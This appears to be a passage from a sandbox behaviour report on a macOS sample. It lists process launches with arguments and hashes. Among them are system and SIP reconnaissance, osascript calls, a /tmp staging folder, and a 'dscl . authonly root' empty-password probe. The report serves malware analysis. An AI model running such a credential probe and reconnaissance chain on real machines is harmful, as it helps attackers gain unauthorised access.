                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/sbin/system_profiler
                                                                      Arguments:system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
                                                                      File size:45472 bytes
                                                                      MD5 hash:271feb2b4c0447da2b7ac523f13a4824

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/sbin/system_profiler
                                                                      Arguments:-
                                                                      File size:45472 bytes
                                                                      MD5 hash:271feb2b4c0447da2b7ac523f13a4824

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/csrutil
                                                                      Arguments:-
                                                                      File size:29760 bytes
                                                                      MD5 hash:f2a9b92081c186a37d886e93bc238a40

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/sbin/system_profiler
                                                                      Arguments:-
                                                                      File size:45472 bytes
                                                                      MD5 hash:271feb2b4c0447da2b7ac523f13a4824

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/sbin/system_profiler
                                                                      Arguments:-
                                                                      File size:45472 bytes
                                                                      MD5 hash:271feb2b4c0447da2b7ac523f13a4824

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:-
                                                                      File size:43232 bytes
                                                                      MD5 hash:f13b7c85f3c1c08fae3b709a536281a1

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:sh -c mkdir -p '/tmp/4302'
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/mkdir
                                                                      Arguments:mkdir -p /tmp/4302
                                                                      File size:18592 bytes
                                                                      MD5 hash:bbbaafd2a4d7dcb9ddd178d814fea708

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:-
                                                                      File size:43232 bytes
                                                                      MD5 hash:f13b7c85f3c1c08fae3b709a536281a1

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:sh -c dscl . authonly 'root' ''
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:54
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/dscl
                                                                      Arguments:dscl . authonly root
                                                                      File size:202560 bytes
                                                                      MD5 hash:9a2337f2a5a6271e0187153296de3c9f

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:55
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/xpcproxy
                                                                      Arguments:-
                                                                      File size:44048 bytes
                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:55
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/dirhelper
                                                                      Arguments:/usr/libexec/dirhelper
                                                                      File size:39376 bytes
                                                                      MD5 hash:23edb05ab305e115e8874baa5b1e3004

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:32:41
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/xpcproxy
                                                                      Arguments:-
                                                                      File size:44048 bytes
                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:32:41
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/firmwarecheckers/eficheck/eficheck
                                                                      Arguments:/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
                                                                      File size:74048 bytes
                                                                      MD5 hash:328beb81a2263449258057506bb4987f

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities